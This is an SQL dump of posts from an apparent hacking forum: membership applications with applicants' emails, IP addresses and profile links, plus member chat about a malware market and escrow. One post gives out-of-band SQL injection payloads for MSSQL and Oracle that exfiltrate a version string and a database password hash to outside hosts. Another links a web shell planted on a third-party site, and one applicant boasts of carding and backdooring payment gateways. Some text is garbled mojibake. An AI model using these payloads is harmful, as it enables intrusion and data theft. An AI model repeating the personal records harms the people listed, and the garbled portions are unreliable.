(2123, 1750, 0, 'Invite', 2, '{$name}', 1411361827, '[SIZE=\'4\'][COLOR=\'Sienna\']Nedka[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: guud@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 92.50.175.198\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://fotki.yandex.ru/users/nedka-111 | http://fotki.yandex.ru/users/nedka-111 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2124, 1083, 1119, 'awert', 22, '', 1411371115, '[quote][url]http://www.faceplusplus.com[/url] [/quote]\nýуöýð ñô, ÿûðтøт þт 3ú òü÷.', 1, 0, '', 0, 1, 0, 0, 0),
(2125, 1748, 2118, 'lumbricus', 39, '', 1411375503, 'Acest lucru a fost confirmat ,ideea este de a transfera piață pe viu platforma.\n\nXMPP + SSL + No logs + Live Escrow Support (Verified)\n\nXMPP(market) - piața chat room - englaza: \" Sales will be performed with escrow agent using OTR, don\'t be stupid and talk without OTR, we trying to educate our users in OPSEC\".\n\n\nXMPP(support) - suport tehnic room \n\nVom crea un săptămânal CTF - XMPP(CTF) - CTF chat room', 1, 0, '', 0, 1, 0, 0, 0),
(2126, 1751, 0, 'lumbricus', 39, 'Mssql - извлечение слепой внеполосÂный (out of band)', 1411379049, 'ÃÂõúþтþрыõ ÑÂþòõты: \n\nBlind Injection âруôýþ?\n\náûõôующøù ÑÂÿþÑÂþñ þñхþôð...\n\n[B]MSSQL[/B] - \n\n(xp_sendmail) - [PHP]https://www.xaptoxa.cz/test.asp?xid=2;;EXEC master.dbo.xp_startmail;EXEC master.dbo.xp_sendmail @recipients = \'makaveli@thuglife.us\', @query =\'select @@version\'--[/PHP]\n\nðûьтõрýðтøòð ÿþчты\n\n(sp_send_dbmail)\n\n[B]ORACLE[/B] - \n\n(utl_http.request) - [PHP]https://www.xaptoxa.cz/test.jsp?xid=2 OR 1=utl_http.request (\'http://www.catchme.com/\'|| (select password from dba_users where rownum=1)) --[/PHP]\n\nßþöðûуùÑÂтð, ôþñðòьтõ ÑÂòþù þÿыт ýøöõ....:D', 1, 0, '', 0, 1, 0, 0, 0),
(2127, 1083, 1119, 'lumbricus', 39, '', 1411380802, 'ýðÿøÑÂðû ò PM - [B]Jabber+OTR þñÑÂ÷ðтõûьýыõ[/B]', 1, 0, '', 0, 1, 0, 0, 0),
(2128, 1752, 0, 'Invite', 2, '{$name}', 1411383285, '[SIZE=\'4\'][COLOR=\'Sienna\']donlee[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 0112112\n[b]e-mail[/b]: leedon20@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.157.55.205\n[*][b]real ip[/b]: 79.157.55.205\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/Donleebaby | https://twitter.com/Donleebaby \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2129, 1748, 2118, 'syslink', 13, '', 1411386448, 'ssl should be fixed soon', 1, 0, '', 0, 1, 0, 0, 0),
(2130, 1748, 2118, 'syslink', 13, '', 1411386830, 'if we had more time on our hands we could develop gov level malware and up the fees to 25k+, but this is clearly not viable due to time restrictions ect so i think .3btc is fine and they do not have access to the forum only the market', 1, 0, '', 0, 1, 0, 0, 0),
(2131, 1748, 2118, 'null', 9, '', 1411387659, 'Then take the order form to search for vulnerabilities, black - more expensive, less white, and confirmation through the txt file in the root of the site.', 1, 1, '', 0, 1, 0, 0, 0),
(2133, 1754, 0, 'Invite', 2, '{$name}', 1411400844, '[SIZE=\'4\'][COLOR=\'Sienna\']craazzzzzy[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 416417\n[b]e-mail[/b]: craazzzzzy@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 213.109.132.173\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://angelas-journey.blogspot.com/2008/06/craazzzzzy.html | http://angelas-journey.blogspot.com/2008/06/craazzzzzy.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2134, 1755, 0, 'Invite', 2, '{$name}', 1411402415, '[SIZE=\'4\'][COLOR=\'Sienna\']ElGanador[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: dsaads@jabber.ru\n[b]e-mail[/b]: das@dasd.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 216.185.114.219\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/ElGanador | https://twitter.com/ElGanador \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2135, 1756, 0, 'Invite', 2, '{$name}', 1411407154, '[SIZE=\'4\'][COLOR=\'Sienna\']KevinHF[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: kevin.w.hofstede@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 94.212.209.143\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.insanelymac.com/forum/user/1345625-kevinhf/ | http://www.insanelymac.com/forum/user/1345625-kevinhf/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2136, 1757, 0, 'Invite', 2, '{$name}', 1411410515, '[SIZE=\'4\'][COLOR=\'Sienna\']cumeh[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: cumehxp@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.220.69.119\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/tsume_wolf | http://vk.com/tsume_wolf \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2137, 1622, 1857, 'Psych0tr1a', 11, '', 1411412353, 'тðúþù øýтõрõÑÂõý?\n[url]http://teleskop.ru/plugins/wso2.php[/url]', 1, 0, '', 0, 1, 0, 0, 0),
(2138, 1748, 2125, 'ropertus', 33, '', 1411422546, '[QUOTE=lumbricus;2125]Acest lucru a fost confirmat ,ideea este de a transfera piață pe viu platforma.\r\n\r\nXMPP + SSL + No logs + Live Escrow Support (Verified)\r\n\r\nXMPP(market) - piața chat room - englaza: \" Sales will be performed with escrow agent using OTR, don\'t be stupid and talk without OTR, we trying to educate our users in OPSEC\".\r\n\r\n\r\nXMPP(support) - suport tehnic room \r\n\r\nVom crea un săptămânal CTF - XMPP(CTF) - CTF chat room[/QUOTE]\r\n\r\nSounds good, I believe w0rm.in XMPP is down?', 1, 1, '', 0, 1, 0, 0, 0),
(2139, 1758, 0, 'Invite', 2, '{$name}', 1411430327, '[SIZE=\'4\'][COLOR=\'Sienna\']darkgeek[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: darkgeek@jabber.ru\n[b]e-mail[/b]: id3@hotmail.de\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.107.237.120\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.102 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.reddit.com/user/darkgeek | http://www.reddit.com/user/darkgeek \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2140, 1759, 0, 'Invite', 2, '{$name}', 1411433455, '[SIZE=\'4\'][COLOR=\'Sienna\']fade[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: fade@darkdna.net\n[b]e-mail[/b]: fade@blacklab.io\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 71.234.184.116\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/while.ashes.fade | http://vk.com/while.ashes.fade \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2141, 1760, 0, 'Invite', 2, '{$name}', 1411438471, '[SIZE=\'4\'][COLOR=\'Sienna\']Fuhrer666[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Fuhrer666@jabber.ru\n[b]e-mail[/b]: Fuhrer666@safe-mail.net\n[b]Info[/b]: I\'m Fuhrer666, I\'m not famous.. well i don\'t like to be famous or show off thats why maybe im not famous i like more to be on the shadows,I really like to get into sites at this time i have on my power arround 80k -100k sites, i like to find 0days on e-commerce scripts that\'s because i focus mostly on the carding scene that\'s my favorite topic but i don\'t card i just like to get cc\'s & more and more... im addicted to get cc\'s :s\r\n\r\nSkils:\r\n-Find 0days(Like SQLi, XSS, & Not only on e-commerce scripts)\r\n-App 0days (Like flash 0days, etc | Execute exes, exploit generators)\r\n-Server Hacking (I love hacking into servers but i do this mostly for botnets & carding shops, i know u may know even carders use lame security on their carding shops :/ EPIC fail)\r\n-Get CC\'s (Ok im good at getting cc\'s how i get well when i get into botnets, caridng shops, e-commerce sites /love to put backdoors on payment gateways ^^/)\r\n\r\n-Botnet Hacking ( Another area where im good at ;) I already hacked into Zeus, Citadel, BlackPOS, Dexter v1, JackPOS (yep the new product of darkode users))\r\n\r\nFamous shit :/ ??\r\n\r\nWell just i hacked into FloMarket was a bit famous i guess...\r\n\r\nAdmin scammed people so get into marketplace to see if was truth & yep they apparently have a vuln on withdraw i have all their SOURCE CODE (server side files) & DB (with users & shit..)\r\n\r\nhttp://www.deepdotweb.com/2014/01/06/flomarket-aaaand-its-gone-with-your-btc/\r\n\r\n& yes i can share it ;)\r\n\r\nFuhrer666 Looking to join this group.. hope is enough\r\n\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 176.10.100.229\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.naruto-arena.com/profile/fuhrer666/ | http://www.naruto-arena.com/profile/fuhrer666/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2142, 1761, 0, 'Invite', 2, '{$name}', 1411455857, '[SIZE=\'4\'][COLOR=\'Sienna\']Saeed[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: cephexin@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 217.23.5.215\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/theferocity | https://twitter.com/theferocity \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2143, 1760, 2141, 'syslink', 13, '', 1411460935, 'Botnet Hacking ( Another area where im good at I already hacked into Zeus, Citadel, BlackPOS, Dexter v1, JackPOS (yep the new product of darkode users))\n\nthese are all old and public exploits with the panels\n\nbut user may be usefull i will add on jabber', 1, 0, '', 0, 1, 0, 0, 0),
(2144, 1083, 2127, 'awert', 22, '', 1411461832, '[QUOTE=lumbricus;2127]ýðÿøÑÂðû ò PM - [B]Jabber+OTR þñÑÂ÷ðтõûьýыõ[/B][/QUOTE]\r\n\r\n[email]awertsc@jabber.dk[/email] (otr)', 1, 0, '', 0, 1, 0, 0, 0),
(2145, 1762, 0, 'Invite', 2, '{$name}', 1411464513, '[SIZE=\'4\'][COLOR=\'Sienna\']mikili[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: nadaram\n[b]e-mail[/b]: grave_night@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 148.251.56.234\n[*][b]real ip[/b]: 148.251.56.234\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/37.0.2062.94 Chrome/37.0.2062.94 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://mikili.de | mikili.de \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2146, 1083, 1119, 'awert', 22, '', 1411470934, 'lumbricus, send me your jabber, I can not reach you', 1, 0, '', 0, 1, 0, 0, 0),
(2148, 1763, 0, 'Invite', 2, '{$name}', 1411471797, '[SIZE=\'4\'][COLOR=\'Sienna\']asssssa[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 10000000\n[b]e-mail[/b]: wronnng@wwwwwww.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 192.240.96.204\n[*][b]real ip[/b]: 192.240.96.204\n[*][b]User agent[/b]: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://asssssa.yolasite.com | asssssa.yolasite.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2149, 1748, 2118, 'lumbricus', 39, '', 1411474668, '@syslink : cu asta sunt de acord.\n\n@ropertus : chat-serverul necesită 12/7 Support sau 24/7..\n\nam idei..săptămânal üðрþôõрÑÂтòþ concursului etc', 1, 0, '', 0, 1, 0, 0, 0),
(2150, 1764, 0, 'Invite', 2, '{$name}', 1411574850, '[SIZE=\'4\'][COLOR=\'Sienna\']none[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: none@jabeer.com\n[b]e-mail[/b]: none@none.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 190.118.225.49\n[*][b]real ip[/b]: 190.118.225.49\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : NoNe : none666@inbox.ru : : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://none.ru | none.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2152, 1766, 0, 'Invite', 2, '{$name}', 1411590646, '[SIZE=\'4\'][COLOR=\'Sienna\']kanass[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: fuvkfuvk@pussy.org\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.111.42.114\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.spoj.com/users/kanass | http://www.spoj.com/users/kanass \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
